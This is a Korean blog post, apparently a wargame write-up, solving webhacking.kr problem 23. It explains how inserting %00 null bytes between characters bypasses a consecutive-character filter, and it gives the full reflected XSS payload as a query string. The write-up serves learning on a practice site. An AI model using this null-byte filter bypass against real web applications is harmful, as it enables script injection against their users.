본문 바로가기

wargame/webhacking.kr

webhacking.kr 23번 문제



안녕하세요 : )




이번에는 webhacking.kr 23번 문제를 풀어보도록 하겠습니다.



문제 설명을 보면 <script>alert(1);</script>를 입력하면 됩니다.


근데 문제는 따른 필터링이 있는 것이 아니라 

바로 문자를 연속으로 사용하지 못한다는 것 입니다.

<s를 입력하면 출력도 시켜주지 않습니다 ㅠㅠ


우회하는 방법으로는 %00을 문자와 문자 사이에 넣어주는 것인데요



이유는 내부 서버 언어에서 검사를 할 때 NULL로 인식을 하기 때문입니다.


?code=<%00s%00c%00r%00i%00p%00t%00>%00a%00l%00e%00r%00t%00(%001%00)%00;%00<%00/%00s%00c%00r%00i%00p%00t%00>





'wargame > webhacking.kr' 카테고리의 다른 글

webhacking.kr 26번 문제  (0) 2017.06.13
webhacking.kr 25번 문제  (0) 2017.06.13
webhacking.kr 23번 문제  (0) 2017.06.13
webhacking.kr 21번 문제  (0) 2017.06.13
webhacking.kr 18번 문제  (0) 2017.06.13
webhacking.kr 17번 문제 풀이  (0) 2017.06.13